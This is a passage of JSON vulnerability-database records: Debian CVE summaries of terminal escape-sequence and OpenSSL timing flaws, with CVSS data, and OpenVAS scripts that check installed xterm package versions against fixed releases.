"DEBIANCVE:CVE-2003-0068", "href": "https://security-tracker.debian.org/tracker/CVE-2003-0068", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T15:20:04", "description": "ssl3_get_record in s3_pkt.c for OpenSSL before 0.9.7a and 0.9.6 before 0.9.6i does not perform a MAC computation if an incorrect block cipher padding is used, which causes an information leak (timing discrepancy) that may make it easier to launch cryptographic attacks that rely on distinguishing between padding and MAC verification errors, possibly leading to extraction of the original plaintext, aka the \"Vaudenay timing attack.\"", "cvss3": {}, "published": "2003-03-03T05:00:00", "type": "debiancve", "title": "CVE-2003-0078", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0078"], "modified": "2003-03-03T05:00:00", "id": "DEBIANCVE:CVE-2003-0078", "href": "https://security-tracker.debian.org/tracker/CVE-2003-0078", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-28T15:22:08", "description": "VTE, as used by default in gnome-terminal terminal emulator 2.2 and as an option in gnome-terminal 2.0, allows attackers to modify the window title via a certain character escape sequence and then insert it back to the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands.", "cvss3": {}, "published": "2003-03-03T05:00:00", "type": "debiancve", "title": "CVE-2003-0070", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0070"], "modified": "2003-03-03T05:00:00", "id": "DEBIANCVE:CVE-2003-0070", "href": "https://security-tracker.debian.org/tracker/CVE-2003-0070", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:52:34", "description": "The rxvt terminal emulator 2.7.8 and earlier allows attackers to modify the window title via a certain character escape sequence and then insert it back to the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands.", "cvss3": {}, "published": "2003-03-03T05:00:00", "type": "debiancve", "title": "CVE-2003-0066", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0066"], "modified": "2003-03-03T05:00:00", "id": "DEBIANCVE:CVE-2003-0066", "href": "https://security-tracker.debian.org/tracker/CVE-2003-0066", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:52:34", "description": "The \"screen dump\" feature in rxvt 2.7.8 allows attackers to overwrite arbitrary files via a certain character escape sequence when it is echoed to a user's terminal, e.g. when the user views a file containing the malicious sequence.", "cvss3": {}, "published": "2003-03-03T05:00:00", "type": "debiancve", "title": "CVE-2003-0022", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0022"], "modified": "2003-03-03T05:00:00", "id": "DEBIANCVE:CVE-2003-0022", "href": "https://security-tracker.debian.org/tracker/CVE-2003-0022", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-11-28T15:20:31", "description": "The PuTTY terminal emulator 0.53 allows attackers to modify the window title via a certain character escape sequence and then insert it back to the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands.", "cvss3": {}, "published": "2003-03-18T05:00:00", "type": "debiancve", "title": "CVE-2003-0069", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0069"], "modified": "2003-03-18T05:00:00", "id": "DEBIANCVE:CVE-2003-0069", "href": "https://security-tracker.debian.org/tracker/CVE-2003-0069", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T22:22:16", "description": "Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.", "cvss3": {}, "published": "2003-03-18T05:00:00", "type": "debiancve", "title": "CVE-2003-0020", "bulletinFamily": "info", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0020"], "modified": "2003-03-18T05:00:00", "id": "DEBIANCVE:CVE-2003-0020", "href": "https://security-tracker.debian.org/tracker/CVE-2003-0020", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-11-29T02:20:07", "description": "Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.", "cvss3": {}, "published": "2003-04-02T05:00:00", "type": "debiancve", "title": "CVE-2003-0083", "bulletinFamily": "info", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0020", "CVE-2003-0083"], "modified": "2003-04-02T05:00:00", "id": "DEBIANCVE:CVE-2003-0083", "href": "https://security-tracker.debian.org/tracker/CVE-2003-0083", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-11-27T22:27:34", "description": "The vte_sequence_handler_window_manipulation function in vteseq.c in libvte (aka libvte9) in VTE 0.25.1 and earlier, as used in gnome-terminal, does not properly handle escape sequences, which allows remote attackers to execute arbitrary commands or obtain potentially sensitive information via a (1) window title or (2) icon title sequence. NOTE: this issue exists because of a CVE-2003-0070 regression.", "cvss3": {}, "published": "2010-08-05T18:17:00", "type": "debiancve", "title": "CVE-2010-2713", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0070", "CVE-2010-2713"], "modified": "2010-08-05T18:17:00", "id": "DEBIANCVE:CVE-2010-2713", "href": "https://security-tracker.debian.org/tracker/CVE-2010-2713", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-29T18:30:06", "description": "Terminology 0.7.0 allows remote attackers to execute arbitrary commands via escape sequences that modify the window title and then are written to the terminal, a similar issue to CVE-2003-0063.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-23T21:59:00", "type": "debiancve", "title": "CVE-2015-8971", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0063", "CVE-2015-8971"], "modified": "2017-01-23T21:59:00", "id": "DEBIANCVE:CVE-2015-8971", "href": "https://security-tracker.debian.org/tracker/CVE-2015-8971", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2017-07-25T10:56:16", "description": "The remote host is missing an update to xterm\nannounced via advisory FEDORA-2009-0059.", "cvss3": {}, "published": "2009-01-07T00:00:00", "type": "openvas", "title": "Fedora Core 9 FEDORA-2009-0059 (xterm)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-2383", "CVE-2003-0071", "CVE-2003-0063"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:63116", "href": "http://plugins.openvas.org/nasl.php?oid=63116", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_0059.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-0059 (xterm)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nThis update fixes the following security issue: CRLF injection vulnerability\nin xterm allows user-assisted attackers to execute arbitrary commands via LF\n(aka \\n) characters surrounding a command name within a Device Control Request\nStatus String (DECRQSS) escape sequence in a text file, a related issue to\nCVE-2003-0063 and CVE-2003-0071.\n\nChangeLog:\n\n* Tue Jan 6 2009 Miroslav Lichvar 238-1\n- update to 238 (#479000, CVE-2008-2383)\n- set default values of allowWindowOps and allowFontOps resources to false\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update xterm' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-0059\";\ntag_summary = \"The remote host is missing an update to xterm\nannounced via advisory FEDORA-2009-0059.\";\n\n\n\nif(description)\n{\n script_id(63116);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-07 23:16:01 +0100 (Wed, 07 Jan 2009)\");\n script_cve_id(\"CVE-2003-0063\", \"CVE-2003-0071\", \"CVE-2008-2383\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 9 FEDORA-2009-0059 (xterm)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=479000\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"xterm\", rpm:\"xterm~238~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xterm-debuginfo\", rpm:\"xterm-debuginfo~238~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:57:07", "description": "The remote host is missing an update to xterm\nannounced via advisory FEDORA-2009-0091.", "cvss3": {}, "published": "2009-01-07T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-0091 (xterm)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-2383", "CVE-2003-0071", "CVE-2003-0063"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:63120", "href": "http://plugins.openvas.org/nasl.php?oid=63120", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_0091.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-0091 (xterm)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nThis update fixes the following security issue: CRLF injection vulnerability\nin xterm allows user-assisted attackers to execute arbitrary commands via LF\n(aka \\n) characters surrounding a command name within a Device Control Request\nStatus String (DECRQSS) escape sequence in a text file, a related issue to\nCVE-2003-0063 and CVE-2003-0071.\n\nChangeLog:\n\n* Tue Jan 6 2009 Miroslav Lichvar 238-1\n- update to 238 (#479000, CVE-2008-2383)\n- set default values of allowWindowOps and allowFontOps resources to false\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update xterm' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-0091\";\ntag_summary = \"The remote host is missing an update to xterm\nannounced via advisory FEDORA-2009-0091.\";\n\n\n\nif(description)\n{\n script_id(63120);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-07 23:16:01 +0100 (Wed, 07 Jan 2009)\");\n script_cve_id(\"CVE-2003-0063\", \"CVE-2003-0071\", \"CVE-2008-2383\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-0091 (xterm)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=479000\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"xterm\", rpm:\"xterm~238~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xterm-debuginfo\", rpm:\"xterm-debuginfo~238~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:38", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2009-01-07T00:00:00", "type": "openvas", "title": "FreeBSD Ports: xterm", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-2383", "CVE-2003-0071", "CVE-2003-0063"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231063104", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063104", "sourceData": "#\n#VID d5e1aac8-db0b-11dd-ae30-001cc0377035\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID d5e1aac8-db0b-11dd-ae30-001cc0377035\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: xterm\n\nCVE-2008-2383\nCRLF injection vulnerability in xterm allows user-assisted attackers\nto execute arbitrary commands via LF (aka \\n) characters surrounding a\ncommand name within a Device Control Request Status String (DECRQSS)\nescape sequence in a text file, a related issue to CVE-2003-0063 and\nCVE-2003-0071.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://bugs.debian.org/cgi-bin/bugreport.cgi?bug=510030\nhttp://www.vuxml.org/freebsd/d5e1aac8-db0b-11dd-ae30-001cc0377035.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63104\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-07 23:16:01 +0100 (Wed, 07 Jan 2009)\");\n script_cve_id(\"CVE-2008-2383\");\n script_bugtraq_id(33060);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: xterm\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"xterm\");\nif(!isnull(bver) && revcomp(a:bver, b:\"238\")<0) {\n txt += 'Package xterm version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:53", "description": "The remote host is missing an update to xterm\nannounced via advisory FEDORA-2009-0059.", "cvss3": {}, "published": "2009-01-07T00:00:00", "type": "openvas", "title": "Fedora Core 9 FEDORA-2009-0059 (xterm)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-2383", "CVE-2003-0071", "CVE-2003-0063"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231063116", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063116", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_0059.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-0059 (xterm)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nThis update fixes the following security issue: CRLF injection vulnerability\nin xterm allows user-assisted attackers to execute arbitrary commands via LF\n(aka \\n) characters surrounding a command name within a Device Control Request\nStatus String (DECRQSS) escape sequence in a text file, a related issue to\nCVE-2003-0063 and CVE-2003-0071.\n\nChangeLog:\n\n* Tue Jan 6 2009 Miroslav Lichvar 238-1\n- update to 238 (#479000, CVE-2008-2383)\n- set default values of allowWindowOps and allowFontOps resources to false\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update xterm' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-0059\";\ntag_summary = \"The remote host is missing an update to xterm\nannounced via advisory FEDORA-2009-0059.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63116\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-07 23:16:01 +0100 (Wed, 07 Jan 2009)\");\n script_cve_id(\"CVE-2003-0063\", \"CVE-2003-0071\", \"CVE-2008-2383\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 9 FEDORA-2009-0059 (xterm)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=479000\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"xterm\", rpm:\"xterm~238~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xterm-debuginfo\", rpm:\"xterm-debuginfo~238~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:21", "description": "The remote host is missing an update to xterm\nannounced via advisory FEDORA-2009-0091.", "cvss3": {}, "published": "2009-01-07T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-0091 (xterm)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-2383", "CVE-2003-0071", "CVE-2003-0063"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231063120", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063120", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_0091.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-0091 (xterm)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth 